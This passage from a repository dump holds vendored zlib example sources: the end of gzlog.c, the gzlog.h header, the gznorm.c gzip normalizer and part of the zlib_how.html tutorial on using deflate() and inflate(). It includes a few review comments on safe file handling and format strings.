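                read(log->fd, (char *)data + next, block) != block)
                break;
            next += block;
        }
        /* a failed read above only leaves the inner loop; it is caught here
           because the file pointer is then not where the extra field says
           the stored data ends */
        if (lseek(log->fd, 0, SEEK_CUR) != log->last + 4 + log->stored)
            break;
        log_touch(log);

        /* write the uncompressed data to the .add file */
        strcpy(log->end, ".add");
        fd = open(log->path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd < 0)
            break;
        ret = (size_t)write(fd, data, len) != len;
        if (ret | close(fd))
            break;
        log_touch(log);

        /* write the dictionary for the next compress to the .temp file */
        strcpy(log->end, ".temp");
        fd = open(log->path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd < 0)
            break;
        next = DICT > len ? len : DICT;
        ret = (size_t)write(fd, (char *)data + len - next, next) != next;
        if (ret | close(fd))
            break;
        log_touch(log);

        /* roll back to compressed data, mark the compress in progress */
        log->last = log->first;
        log->stored = 0;
        if (log_mark(log, COMPRESS_OP))
            break;
        BAIL(7);

        /* compress and append the data (clears mark) */
        ret = log_compress(log, data, len);
        free(data);
        return ret;
    } while (0);

    /* broke out of do above on i/o error */
    free(data);
    return -1;
}

/* gzlog_write() return values:
    0: all good
   -1: file i/o error (usually access issue)
   -2: memory allocation failure
   -3: invalid log pointer argument

   The data is first saved to foo.add and foo.gz is marked as having an append
   in progress, so that an interrupted append can be redone on the next open.
   A NULL data pointer or a zero len is accepted and does nothing.

   NOTE(review): foo.add is opened by name with O_CREAT | O_TRUNC and mode
   0644, with the same symbolic link and permission considerations as in
   gzlog_compress(). */
int gzlog_write(gzlog *logd, void *data, size_t len)
{
    int fd, ret;
    struct log *log = logd;

    /* check arguments */
    if (log == NULL || strcmp(log->id, LOGID))
        return -3;
    if (data == NULL || len <= 0)
        return 0;

    /* see if we lost the lock -- if so get it again and reload the extra
       field information (it probably changed), recover last operation if
       necessary */
    if (log_check(log) && log_open(log))
        return -1;

    /* create and write .add file */
    strcpy(log->end, ".add");
    fd = open(log->path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    ret = (size_t)write(fd, data, len) != len;
    if (ret | close(fd))
        return -1;
    log_touch(log);

    /* mark log file with append in progress */
    if (log_mark(log, APPEND_OP))
        return -1;
    BAIL(8);

    /* append data (clears mark) */
    if (log_append(log, data, len))
        return -1;

    /* check to see if it's time to compress -- if not, then done */
    if (((log->last - log->first) >> 10) + (log->stored >> 10) < TRIGGER)
        return 0;

    /* time to compress */
    return gzlog_compress(log);
}

/* gzlog_close() return values:
    0: ok
   -3: invalid log pointer argument

   The id field is overwritten before the structure is freed so that a later
   call with the same pointer is less likely to pass the LOGID check. */
int gzlog_close(gzlog *logd)
{
    struct log *log = logd;

    /* check arguments */
    if (log == NULL || strcmp(log->id, LOGID))
        return -3;

    /* close the log file and release the lock */
    log_close(log);

    /* free structure and return */
    if (log->path != NULL)
        free(log->path);
    strcpy(log->id, "bad");
    free(log);
    return 0;
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/gzlog.h
================================================
/* gzlog.h
  Copyright (C) 2004, 2008, 2012 Mark Adler, all rights reserved
  version 2.2, 14 Aug 2012

  This software is provided 'as-is', without any express or implied
  warranty. In no event will the author be held liable for any damages
  arising from the use of this software.

  Permission is granted to anyone to use this software for any purpose,
  including commercial applications, and to alter it and redistribute it
  freely, subject to the following restrictions:

  1. The origin of this software must not be misrepresented; you must not
     claim that you wrote the original software. If you use this software
     in a product, an acknowledgment in the product documentation would be
     appreciated but is not required.
  2. Altered source versions must be plainly marked as such, and must not be
     misrepresented as being the original software.
  3. This notice may not be removed or altered from any source distribution.

  Mark Adler    madler@alumni.caltech.edu
 */

/* Version History:
   1.0  26 Nov 2004  First version
   2.0  25 Apr 2008  Complete redesign for recovery of interrupted operations
                     Interface changed slightly in that now path is a prefix
                     Compression now occurs as needed during gzlog_write()
                     gzlog_write() now always leaves the log file as valid gzip
   2.1   8 Jul 2012  Fix argument checks in gzlog_compress() and gzlog_write()
   2.2  14 Aug 2012  Clean up signed comparisons
 */

/*
   The gzlog object allows writing short messages to a gzipped log file,
   opening the log file locked for small bursts, and then closing it. The log
   object works by appending stored (uncompressed) data to the gzip file until
   1 MB has been accumulated. At that time, the stored data is compressed, and
   replaces the uncompressed data in the file. The log file is truncated to
   its new size at that time.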
After each write operation, the log file is a valid gzip file that can be
   decompressed to recover what was written.

   The gzlog operations can be interrupted at any point due to an application or
   system crash, and the log file will be recovered the next time the log is
   opened with gzlog_open().
 */

#ifndef GZLOG_H
#define GZLOG_H

/* gzlog object type */
typedef void gzlog;

/* Open a gzlog object, creating the log file if it does not exist. Return
   NULL on error. Note that gzlog_open() could take a while to complete if it
   has to wait to verify that a lock is stale (possibly for five minutes), or
   if there is significant contention with other instantiations of this object
   when locking the resource. path is the prefix of the file names created by
   this object. If path is "foo", then the log file will be "foo.gz", and
   other auxiliary files will be created and destroyed during the process:
   "foo.dict" for a compression dictionary, "foo.temp" for a temporary (next)
   dictionary, "foo.add" for data being added or compressed, "foo.lock" for the
   lock file, and "foo.repairs" to log recovery operations performed due to
   interrupted gzlog operations. A gzlog_open() followed by a gzlog_close()
   will recover a previously interrupted operation, if any.

   All of these names are derived from path and the files are opened by name,
   so path should sit in a directory that only the account doing the logging
   can write to. */
gzlog *gzlog_open(char *path);

/* Write to a gzlog object. Return zero on success, -1 if there is a file i/o
   error on any of the gzlog files (this should not happen if gzlog_open()
   succeeded, unless the device has run out of space or leftover auxiliary
   files have permissions or ownership that prevent their use), -2 if there is
   a memory allocation failure, or -3 if the log argument is invalid (e.g. if
   it was not created by gzlog_open()). This function will write data to the
   file uncompressed, until 1 MB has been accumulated, at which time that data
   will be compressed. The log file will be a valid gzip file upon successful
   return. */
int gzlog_write(gzlog *log, void *data, size_t len);

/* Force compression of any uncompressed data in the log.
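This should be used sparingly, if at all. The main application would be when
   a log file will not be appended to again. If this is used to compress
   frequently while appending, it will both significantly increase the
   execution time and reduce the compression ratio. The return codes are the
   same as for gzlog_write(). */
int gzlog_compress(gzlog *log);

/* Close a gzlog object. Return zero on success, -3 if the log argument is
   invalid. The log object is freed, and so cannot be referenced again. */
int gzlog_close(gzlog *log);

#endif

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/gznorm.c
================================================
/* gznorm.c -- normalize a gzip stream
 * Copyright (C) 2018 Mark Adler
 * For conditions of distribution and use, see copyright notice in zlib.h
 * Version 1.0 7 Oct 2018 Mark Adler */

// gznorm takes a gzip stream, potentially containing multiple members, and
// converts it to a gzip stream with a single member. In addition the gzip
// header is normalized, removing the file name and time stamp, and setting the
// other header contents (XFL, OS) to fixed values. gznorm does not recompress
// the data, so it is fast, but no advantage is gained from the history that
// could be available across member boundaries.

#include <stdio.h>      // fread, fwrite, putc, fflush, ferror, fprintf,
                        // vsnprintf, stdout, stderr, NULL, FILE
#include <stdlib.h>     // malloc, free
#include <string.h>     // strerror
#include <errno.h>      // errno
#include <stdarg.h>     // va_list, va_start, va_end
#include "zlib.h"       // inflateInit2, inflate, inflateReset, inflateEnd,
                        // z_stream, z_off_t, crc32_combine, Z_NULL, Z_BLOCK,
                        // Z_OK, Z_STREAM_END, Z_BUF_ERROR, Z_DATA_ERROR,
                        // Z_MEM_ERROR

// On systems that distinguish text from binary streams, SET_BINARY_MODE
// switches a stdio stream to binary mode; elsewhere it expands to nothing.
#if defined(MSDOS) || defined(OS2) || defined(WIN32) || defined(__CYGWIN__)
#  include <fcntl.h>    // O_BINARY
#  include <io.h>       // setmode
#  define SET_BINARY_MODE(file) setmode(fileno(file), O_BINARY)
#else
#  define SET_BINARY_MODE(file)
#endif

#define local static

// printf to an allocated string.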
// Return the string, or NULL if the printf or
// allocation fails. The caller owns the returned string. fmt is handed to
// vsnprintf() unchanged, so it must never be built from input data; such data
// belongs in an argument to a literal format.
local char *aprintf(char *fmt, ...) {
    va_list ap;
    int need;
    char *out;

    // First pass: format into nothing to learn how many characters result.
    va_start(ap, fmt);
    need = vsnprintf(NULL, 0, fmt, ap);
    va_end(ap);
    if (need < 0)
        return NULL;

    // Second pass: format into a buffer of exactly that size plus the
    // terminating null.
    out = malloc(need + 1);
    if (out != NULL) {
        va_start(ap, fmt);
        vsnprintf(out, need + 1, fmt, ap);
        va_end(ap);
    }
    return out;
}

// Return with an error, putting an allocated error message in *err. Doing an
// inflateEnd() on an already ended state, or one with state set to Z_NULL, is
// permitted.
#define BYE(...) \
    do { \
        inflateEnd(&strm); \
        *err = aprintf(__VA_ARGS__); \
        return 1; \
    } while (0)

// Chunk size for buffered reads and for decompression. Twice this many bytes
// will be allocated on the stack by gzip_normalize(). Must fit in an unsigned.
#define CHUNK 16384

// Read a gzip stream from in and write an equivalent normalized gzip stream to
// out. If given no input, an empty gzip stream will be written. If successful,
// 0 is returned, and *err is set to NULL. On error, 1 is returned, where the
// details of the error are returned in *err, a pointer to an allocated string.
//
// The input may be a stream with multiple gzip members, which is converted to
// a single gzip member on the output. Each gzip member is decompressed at the
// level of deflate blocks. This enables clearing the last-block bit, shifting
// the compressed data to concatenate to the previous member's compressed data,
// which can end at an arbitrary bit boundary, and identifying stored blocks in
// order to resynchronize those to byte boundaries. The deflate compressed data
// is terminated with a 10-bit empty fixed block. If any members on the input
// end with a 10-bit empty fixed block, then that block is excised from the
// stream.
This avoids appending empty fixed blocks for every normalization, // and assures that gzip_normalize applied a second time will not change the // input. The pad bits after stored block headers and after the final deflate // block are all forced to zeros. local int gzip_normalize(FILE *in, FILE *out, char **err) { // initialize the inflate engine to process a gzip member z_stream strm; strm.zalloc = Z_NULL; strm.zfree = Z_NULL; strm.opaque = Z_NULL; strm.avail_in = 0; strm.next_in = Z_NULL; if (inflateInit2(&strm, 15 + 16) != Z_OK) BYE("out of memory"); // State while processing the input gzip stream. enum { // BETWEEN -> HEAD -> BLOCK -> TAIL -> BETWEEN -> ... BETWEEN, // between gzip members (must end in this state) HEAD, // reading a gzip header BLOCK, // reading deflate blocks TAIL // reading a gzip trailer } state = BETWEEN; // current component being processed unsigned long crc = 0; // accumulated CRC of uncompressed data unsigned long len = 0; // accumulated length of uncompressed data unsigned long buf = 0; // deflate stream bit buffer of num bits int num = 0; // number of bits in buf (at bottom) // Write a canonical gzip header (no mod time, file name, comment, extra // block, or extra flags, and OS is marked as unknown). fwrite("\x1f\x8b\x08\0\0\0\0\0\0\xff", 1, 10, out); // Process the gzip stream from in until reaching the end of the input, // encountering invalid input, or experiencing an i/o error. int more; // true if not at the end of the input do { // State inside this loop. unsigned char *put; // next input buffer location to process int prev; // number of bits from previous block in // the bit buffer, or -1 if not at the // start of a block unsigned long long memb; // uncompressed length of member size_t tail; // number of trailer bytes read (0..8) unsigned long part; // accumulated trailer component // Get the next chunk of input from in. 
unsigned char dat[CHUNK]; strm.avail_in = fread(dat, 1, CHUNK, in); if (strm.avail_in == 0) break; more = strm.avail_in == CHUNK; strm.next_in = put = dat; // Run that chunk of input through the inflate engine to exhaustion. do { // At this point it is assured that strm.avail_in > 0. // Inflate until the end of a gzip component (header, deflate // block, trailer) is reached, or until all of the chunk is // consumed. The resulting decompressed data is discarded, though // the total size of the decompressed data in each member is // tracked, for the calculation of the total CRC. do { // inflate and handle any errors unsigned char scrap[CHUNK]; strm.avail_out = CHUNK; strm.next_out = scrap; int ret = inflate(&strm, Z_BLOCK); if (ret == Z_MEM_ERROR) BYE("out of memory"); if (ret == Z_DATA_ERROR) BYE("input invalid: %s", strm.msg); if (ret != Z_OK && ret != Z_BUF_ERROR && ret != Z_STREAM_END) BYE("internal error"); // Update the number of uncompressed bytes generated in this // member. The actual count (not modulo 2^32) is required to // correctly compute the total CRC. unsigned got = CHUNK - strm.avail_out; memb += got; if (memb < got) BYE("overflow error"); // Continue to process this chunk until it is consumed, or // until the end of a component (header, deflate block, or // trailer) is reached. } while (strm.avail_out == 0 && (strm.data_type & 0x80) == 0); // Since strm.avail_in was > 0 for the inflate call, some input was // just consumed. It is therefore assured that put < strm.next_in. // Disposition the consumed component or part of a component. switch (state) { case BETWEEN: state = HEAD; // Fall through to HEAD when some or all of the header is // processed. case HEAD: // Discard the header. if (strm.data_type & 0x80) { // End of header reached -- deflate blocks follow. put = strm.next_in; prev = num; memb = 0; state = BLOCK; } break; case BLOCK: // Copy the deflate stream to the output, but with the // last-block-bit cleared. 
Re-synchronize stored block // headers to the output byte boundaries. The bytes at // put..strm.next_in-1 is the compressed data that has been // processed and is ready to be copied to the output. // At this point, it is assured that new compressed data is // available, i.e., put < strm.next_in. If prev is -1, then // that compressed data starts in the middle of a deflate // block. If prev is not -1, then the bits in the bit // buffer, possibly combined with the bits in *put, contain // the three-bit header of the new deflate block. In that // case, prev is the number of bits from the previous block // that remain in the bit buffer. Since num is the number // of bits in the bit buffer, we have that num - prev is // the number of bits from the new block currently in the // bit buffer. // If strm.data_type & 0xc0 is 0x80, then the last byte of // the available compressed data includes the last bits of // the end of a deflate block. In that case, that last byte // also has strm.data_type & 0x1f bits of the next deflate // block, in the range 0..7. If strm.data_type & 0xc0 is // 0xc0, then the last byte of the compressed data is the // end of the deflate stream, followed by strm.data_type & // 0x1f pad bits, also in the range 0..7. // Set bits to the number of bits not yet consumed from the // last byte. If we are at the end of the block, bits is // either the number of bits in the last byte belonging to // the next block, or the number of pad bits after the // final block. In either of those cases, bits is in the // range 0..7. ; // (required due to C syntax oddity) int bits = strm.data_type & 0x1f; if (prev != -1) { // We are at the start of a new block. Clear the last // block bit, and check for special cases. If it is a // stored block, then emit the header and pad to the // next byte boundary. If it is a final, empty fixed // block, then excise it. // Some or all of the three header bits for this block // may already be in the bit buffer. 
Load any remaining // header bits into the bit buffer. if (num - prev < 3) { buf += (unsigned long)*put++ << num; num += 8; } // Set last to have a 1 in the position of the last // block bit in the bit buffer. unsigned long last = (unsigned long)1 << prev; if (((buf >> prev) & 7) == 3) { // This is a final fixed block. Load at least ten // bits from this block, including the header, into // the bit buffer. We already have at least three, // so at most one more byte needs to be loaded. if (num - prev < 10) { if (put == strm.next_in) // Need to go get and process more input. // We'll end up back here to finish this. break; buf += (unsigned long)*put++ << num; num += 8; } if (((buf >> prev) & 0x3ff) == 3) { // That final fixed block is empty. Delete it // to avoid adding an empty block every time a // gzip stream is normalized. num = prev; buf &= last - 1; // zero the pad bits } } else if (((buf >> prev) & 6) == 0) { // This is a stored block. Flush to the next // byte boundary after the three-bit header. num = (prev + 10) & ~7; buf &= last - 1; // zero the pad bits } // Clear the last block bit. buf &= ~last; // Write out complete bytes in the bit buffer. while (num >= 8) { putc(buf, out); buf >>= 8; num -= 8; } // If no more bytes left to process, then we have // consumed the byte that had bits from the next block. if (put == strm.next_in) bits = 0; } // We are done handling the deflate block header. Now copy // all or almost all of the remaining compressed data that // has been processed so far. Don't copy one byte at the // end if it contains bits from the next deflate block or // pad bits at the end of a deflate block. // mix is 1 if we are at the end of a deflate block, and if // some of the bits in the last byte follow this block. mix // is 0 if we are in the middle of a deflate block, if the // deflate block ended on a byte boundary, or if all of the // compressed data processed so far has been consumed. 
int mix = (strm.data_type & 0x80) && bits; // Copy all of the processed compressed data to the output, // except for the last byte if it contains bits from the // next deflate block or pad bits at the end of the deflate // stream. Copy the data after shifting in num bits from // buf in front of it, leaving num bits from the end of the // compressed data in buf when done. unsigned char *end = strm.next_in - mix; if (put < end) { if (num) // Insert num bits from buf before the data being // copied. do { buf += (unsigned)(*put++) << num; putc(buf, out); buf >>= 8; } while (put < end); else { // No shifting needed -- write directly. fwrite(put, 1, end - put, out); put = end; } } // Process the last processed byte if it wasn't written. if (mix) { // Load the last byte into the bit buffer. buf += (unsigned)(*put++) << num; num += 8; if (strm.data_type & 0x40) { // We are at the end of the deflate stream and // there are bits pad bits. Discard the pad bits // and write a byte to the output, if available. // Leave the num bits left over in buf to prepend // to the next deflate stream. num -= bits; if (num >= 8) { putc(buf, out); num -= 8; buf >>= 8; } // Force the pad bits in the bit buffer to zeros. buf &= ((unsigned long)1 << num) - 1; // Don't need to set prev here since going to TAIL. } else // At the end of an internal deflate block. Leave // the last byte in the bit buffer to examine on // the next entry to BLOCK, when more bits from the // next block will be available. prev = num - bits; // number of bits in buffer // from current block } // Don't have a byte left over, so we are in the middle of // a deflate block, or the deflate block ended on a byte // boundary. Set prev appropriately for the next entry into // BLOCK. else if (strm.data_type & 0x80) // The block ended on a byte boundary, so no header // bits are in the bit buffer. prev = num; else // In the middle of a deflate block, so no header here. prev = -1; // Check for the end of the deflate stream. 
if ((strm.data_type & 0xc0) == 0xc0) { // That ends the deflate stream on the input side, the // pad bits were discarded, and any remaining bits from // the last block in the stream are saved in the bit // buffer to prepend to the next stream. Process the // gzip trailer next. tail = 0; part = 0; state = TAIL; } break; case TAIL: // Accumulate available trailer bytes to update the total // CRC and the total uncompressed length. do { part = (part >> 8) + ((unsigned long)(*put++) << 24); tail++; if (tail == 4) { // Update the total CRC. z_off_t len2 = memb; if (len2 < 0 || (unsigned long long)len2 != memb) BYE("overflow error"); crc = crc ? crc32_combine(crc, part, len2) : part; part = 0; } else if (tail == 8) { // Update the total uncompressed length. (It's ok // if this sum is done modulo 2^32.) len += part; // At the end of a member. Set up to inflate an // immediately following gzip member. (If we made // it this far, then the trailer was valid.) if (inflateReset(&strm) != Z_OK) BYE("internal error"); state = BETWEEN; break; } } while (put < strm.next_in); break; } // Process the input buffer until completely consumed. } while (strm.avail_in > 0); // Process input until end of file, invalid input, or i/o error. } while (more); // Done with the inflate engine. inflateEnd(&strm); // Verify the validity of the input. if (state != BETWEEN) BYE("input invalid: incomplete gzip stream"); // Write the remaining deflate stream bits, followed by a terminating // deflate fixed block. buf += (unsigned long)3 << num; putc(buf, out); putc(buf >> 8, out); if (num > 6) putc(0, out); // Write the gzip trailer, which is the CRC and the uncompressed length // modulo 2^32, both in little-endian order. putc(crc, out); putc(crc >> 8, out); putc(crc >> 16, out); putc(crc >> 24, out); putc(len, out); putc(len >> 8, out); putc(len >> 16, out); putc(len >> 24, out); fflush(out); // Check for any i/o errors. if (ferror(in) || ferror(out)) BYE("i/o error: %s", strerror(errno)); // All good! 
*err = NULL; return 0; } // Normalize the gzip stream on stdin, writing the result to stdout. int main(void) { // Avoid end-of-line conversions on evil operating systems. SET_BINARY_MODE(stdin); SET_BINARY_MODE(stdout); // Normalize from stdin to stdout, returning 1 on error, 0 if ok. char *err; int ret = gzip_normalize(stdin, stdout, &err); if (ret) fprintf(stderr, "gznorm error: %s\n", err); free(err); return ret; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/zlib_how.html ================================================ zlib Usage Example

zlib Usage Example

We often get questions about how the deflate() and inflate() functions should be used. Users wonder when they should provide more input, when they should use more output, what to do with a Z_BUF_ERROR, how to make sure the process terminates properly, and so on. So for those who have read zlib.h (a few times), and would like further edification, below is an annotated example in C of simple routines to compress and decompress from an input file to an output file using deflate() and inflate() respectively. The annotations are interspersed between lines of the code. So please read between the lines. We hope this helps explain some of the intricacies of zlib.

Without further ado, here is the program zpipe.c:


/* zpipe.c: example of proper use of zlib's inflate() and deflate()
   Not copyrighted -- provided to the public domain
   Version 1.4  11 December 2005  Mark Adler */

/* Version history:
   1.0  30 Oct 2004  First version
   1.1   8 Nov 2004  Add void casting for unused return values
                     Use switch statement for inflate() return values
   1.2   9 Nov 2004  Add assertions to document zlib guarantees
   1.3   6 Apr 2005  Remove incorrect assertion in inf()
   1.4  11 Dec 2005  Add hack to avoid MSDOS end-of-line conversions
                     Avoid some compiler warnings for input and output buffers
 */
We now include the header files for the required definitions. From stdio.h we use fopen(), fread(), fwrite(), feof(), ferror(), and fclose() for file i/o, and fputs() for error messages. From string.h we use strcmp() for command line argument processing. From assert.h we use the assert() macro. From zlib.h we use the basic compression functions deflateInit(), deflate(), and deflateEnd(), and the basic decompression functions inflateInit(), inflate(), and inflateEnd().

#include <stdio.h>
#include <string.h>
#include <assert.h>
#include "zlib.h"
This is an ugly hack required to avoid corruption of the input and output data on Windows/MS-DOS systems. Without this, those systems would assume that the input and output files are text, and try to convert the end-of-line characters from one standard to another. That would corrupt binary data, and in particular would render the compressed data unusable. This sets the input and output to binary which suppresses the end-of-line conversions. SET_BINARY_MODE() will be used later on stdin and stdout, at the beginning of main().

#if defined(MSDOS) || defined(OS2) || defined(WIN32) || defined(__CYGWIN__)
#  include <fcntl.h>
#  include <io.h>
#  define SET_BINARY_MODE(file) setmode(fileno(file), O_BINARY)
#else
#  define SET_BINARY_MODE(file)
#endif
CHUNK is simply the buffer size for feeding data to and pulling data from the zlib routines. Larger buffer sizes would be more efficient, especially for inflate(). If the memory is available, buffer sizes on the order of 128K or 256K bytes should be used.

#define CHUNK 16384
The def() routine compresses data from an input file to an output file. The output data will be in the zlib format, which is different from the gzip or zip formats. The zlib format has a very small header of only two bytes to identify it as a zlib stream and to provide decoding information, and a four-byte trailer with a fast check value to verify the integrity of the uncompressed data after decoding.

/* Compress from file source to file dest until EOF on source.
   def() returns Z_OK on success, Z_MEM_ERROR if memory could not be
   allocated for processing, Z_STREAM_ERROR if an invalid compression
   level is supplied, Z_VERSION_ERROR if the version of zlib.h and the
   version of the library linked do not match, or Z_ERRNO if there is
   an error reading or writing the files. */
int def(FILE *source, FILE *dest, int level)
{
Here are the local variables for def(). ret will be used for zlib return codes. flush will keep track of the current flushing state for deflate(), which is either no flushing, or flush to completion after the end of the input file is reached. have is the amount of data returned from deflate(). The strm structure is used to pass information to and from the zlib routines, and to maintain the deflate() state. in and out are the input and output buffers for deflate().

    int ret, flush;
    unsigned have;
    z_stream strm;
    unsigned char in[CHUNK];
    unsigned char out[CHUNK];
The first thing we do is to initialize the zlib state for compression using deflateInit(). This must be done before the first use of deflate(). The zalloc, zfree, and opaque fields in the strm structure must be initialized before calling deflateInit(). Here they are set to the zlib constant Z_NULL to request that zlib use the default memory allocation routines. An application may also choose to provide custom memory allocation routines here. deflateInit() will allocate on the order of 256K bytes for the internal state. (See zlib Technical Details.)

deflateInit() is called with a pointer to the structure to be initialized and the compression level, which is an integer in the range of -1 to 9. Lower compression levels result in faster execution, but less compression. Higher levels result in greater compression, but slower execution. The zlib constant Z_DEFAULT_COMPRESSION, equal to -1, provides a good compromise between compression and speed and is equivalent to level 6. Level 0 actually does no compression at all, and in fact expands the data slightly to produce the zlib format (it is not a byte-for-byte copy of the input). More advanced applications of zlib may use deflateInit2() here instead. Such an application may want to reduce how much memory will be used, at some price in compression. Or it may need to request a gzip header and trailer instead of a zlib header and trailer, or raw encoding with no header or trailer at all.

We must check the return value of deflateInit() against the zlib constant Z_OK to make sure that it was able to allocate memory for the internal state, and that the provided arguments were valid. deflateInit() will also check that the version of zlib that the zlib.h file came from matches the version of zlib actually linked with the program. This is especially important for environments in which zlib is a shared library.

Note that an application can initialize multiple, independent zlib streams, which can operate in parallel. The state information maintained in the structure allows the zlib routines to be reentrant.


    /* allocate deflate state */
    strm.zalloc = Z_NULL;
    strm.zfree = Z_NULL;
    strm.opaque = Z_NULL;
    ret = deflateInit(&strm, level);
    if (ret != Z_OK)
        return ret;
With the pleasantries out of the way, now we can get down to business. The outer do-loop reads all of the input file and exits at the bottom of the loop once end-of-file is reached. This loop contains the only call of deflate(). So we must make sure that all of the input data has been processed and that all of the output data has been generated and consumed before we fall out of the loop at the bottom.

    /* compress until end of file */
    do {
We start off by reading data from the input file. The number of bytes read is put directly into avail_in, and a pointer to those bytes is put into next_in. We also check to see if end-of-file on the input has been reached using feof(). If we are at the end of file, then flush is set to the zlib constant Z_FINISH, which is later passed to deflate() to indicate that this is the last chunk of input data to compress. If we are not yet at the end of the input, then the zlib constant Z_NO_FLUSH will be passed to deflate to indicate that we are still in the middle of the uncompressed data.

If there is an error in reading from the input file, the process is aborted with deflateEnd() being called to free the allocated zlib state before returning the error. We wouldn't want a memory leak, now would we? deflateEnd() can be called at any time after the state has been initialized. Once that's done, deflateInit() (or deflateInit2()) would have to be called to start a new compression process. There is no point here in checking the deflateEnd() return code. The deallocation can't fail.


        strm.avail_in = fread(in, 1, CHUNK, source);
        if (ferror(source)) {
            (void)deflateEnd(&strm);
            return Z_ERRNO;
        }
        flush = feof(source) ? Z_FINISH : Z_NO_FLUSH;
        strm.next_in = in;
The inner do-loop passes our chunk of input data to deflate(), and then keeps calling deflate() until it is done producing output. Once there is no more new output, deflate() is guaranteed to have consumed all of the input, i.e., avail_in will be zero.

        /* run deflate() on input until output buffer not full, finish
           compression if all of source has been read in */
        do {
Output space is provided to deflate() by setting avail_out to the number of available output bytes and next_out to a pointer to that space.

            strm.avail_out = CHUNK;
            strm.next_out = out;
Now we call the compression engine itself, deflate(). It takes as many of the avail_in bytes at next_in as it can process, and writes as many as avail_out bytes to next_out. Those counters and pointers are then updated past the input data consumed and the output data written. It is the amount of output space available that may limit how much input is consumed. Hence the inner loop to make sure that all of the input is consumed by providing more output space each time. Since avail_in and next_in are updated by deflate(), we don't have to mess with those between deflate() calls until it's all used up.

The parameters to deflate() are a pointer to the strm structure containing the input and output information and the internal compression engine state, and a parameter indicating whether and how to flush data to the output. Normally deflate will consume several K bytes of input data before producing any output (except for the header), in order to accumulate statistics on the data for optimum compression. It will then put out a burst of compressed data, and proceed to consume more input before the next burst. Eventually, deflate() must be told to terminate the stream, complete the compression with provided input data, and write out the trailer check value. deflate() will continue to compress normally as long as the flush parameter is Z_NO_FLUSH. Once the Z_FINISH parameter is provided, deflate() will begin to complete the compressed output stream. However depending on how much output space is provided, deflate() may have to be called several times until it has provided the complete compressed stream, even after it has consumed all of the input. The flush parameter must continue to be Z_FINISH for those subsequent calls.

There are other values of the flush parameter that are used in more advanced applications. You can force deflate() to produce a burst of output that encodes all of the input data provided so far, even if it wouldn't have otherwise, for example to control data latency on a link with compressed data. You can also ask that deflate() do that as well as erase any history up to that point so that what follows can be decompressed independently, for example for random access applications. Both requests will degrade compression by an amount depending on how often such requests are made.

deflate() has a return value that can indicate errors, yet we do not check it here. Why not? Well, it turns out that deflate() can do no wrong here. Let's go through deflate()'s return values and dispense with them one by one. The possible values are Z_OK, Z_STREAM_END, Z_STREAM_ERROR, or Z_BUF_ERROR. Z_OK is, well, ok. Z_STREAM_END is also ok and will be returned for the last call of deflate(). This is already guaranteed by calling deflate() with Z_FINISH until it has no more output. Z_STREAM_ERROR is only possible if the stream is not initialized properly, but we did initialize it properly. There is no harm in checking for Z_STREAM_ERROR here, for example to check for the possibility that some other part of the application inadvertently clobbered the memory containing the zlib state. Z_BUF_ERROR will be explained further below, but suffice it to say that this is simply an indication that deflate() could not consume more input or produce more output. deflate() can be called again with more output space or more available input, which it will be in this code.


            ret = deflate(&strm, flush);    /* no bad return value */
            assert(ret != Z_STREAM_ERROR);  /* state not clobbered */
Now we compute how much output deflate() provided on the last call, which is the difference between how much space was provided before the call, and how much output space is still available after the call. Then that data, if any, is written to the output file. We can then reuse the output buffer for the next call of deflate(). Again if there is a file i/o error, we call deflateEnd() before returning to avoid a memory leak.

            have = CHUNK - strm.avail_out;
            if (fwrite(out, 1, have, dest) != have || ferror(dest)) {
                (void)deflateEnd(&strm);
                return Z_ERRNO;
            }
The inner do-loop is repeated until the last deflate() call fails to fill the provided output buffer. Then we know that deflate() has done as much as it can with the provided input, and that all of that input has been consumed. We can then fall out of this loop and reuse the input buffer.

The way we tell that deflate() has no more output is by seeing that it did not fill the output buffer, leaving avail_out greater than zero. However suppose that deflate() has no more output, but just so happened to exactly fill the output buffer! avail_out is zero, and we can't tell that deflate() has done all it can. As far as we know, deflate() has more output for us. So we call it again. But now deflate() produces no output at all, and avail_out remains unchanged as CHUNK. That deflate() call wasn't able to do anything, either consume input or produce output, and so it returns Z_BUF_ERROR. (See, I told you I'd cover this later.) However this is not a problem at all. Now we finally have the desired indication that deflate() is really done, and so we drop out of the inner loop to provide more input to deflate().

With flush set to Z_FINISH, this final set of deflate() calls will complete the output stream. Once that is done, subsequent calls of deflate() would return Z_STREAM_ERROR if the flush parameter is not Z_FINISH, and do no more processing until the state is reinitialized.

Some applications of zlib have two loops that call deflate() instead of the single inner loop we have here. The first loop would call without flushing and feed all of the data to deflate(). The second loop would call deflate() with no more data and the Z_FINISH parameter to complete the process. As you can see from this example, that can be avoided by simply keeping track of the current flush state.


        } while (strm.avail_out == 0);
        assert(strm.avail_in == 0);     /* all input will be used */
Now we check to see if we have already processed all of the input file. That information was saved in the flush variable, so we see if that was set to Z_FINISH. If so, then we're done and we fall out of the outer loop. We're guaranteed to get Z_STREAM_END from the last deflate() call, since we ran it until the last chunk of input was consumed and all of the output was generated.

        /* done when last data in file processed */
    } while (flush != Z_FINISH);
    assert(ret == Z_STREAM_END);        /* stream will be complete */
The process is complete, but we still need to deallocate the state to avoid a memory leak (or rather more like a memory hemorrhage if you didn't do this). Then finally we can return with a happy return value.

    /* clean up and return */
    (void)deflateEnd(&strm);
    return Z_OK;
}
Now we do the same thing for decompression in the inf() routine. inf() decompresses what is hopefully a valid zlib stream from the input file and writes the uncompressed data to the output file. Much of the discussion above for def() applies to inf() as well, so the discussion here will focus on the differences between the two.

/* Decompress from file source to file dest until stream ends or EOF.
   inf() returns Z_OK on success, Z_MEM_ERROR if memory could not be
   allocated for processing, Z_DATA_ERROR if the deflate data is
   invalid or incomplete, Z_VERSION_ERROR if the version of zlib.h and
   the version of the library linked do not match, or Z_ERRNO if there
   is an error reading or writing the files. */
int inf(FILE *source, FILE *dest)
{
The local variables have the same functionality as they do for def(). The only difference is that there is no flush variable, since inflate() can tell from the zlib stream itself when the stream is complete.

    int ret;
    unsigned have;
    z_stream strm;
    unsigned char in[CHUNK];
    unsigned char out[CHUNK];
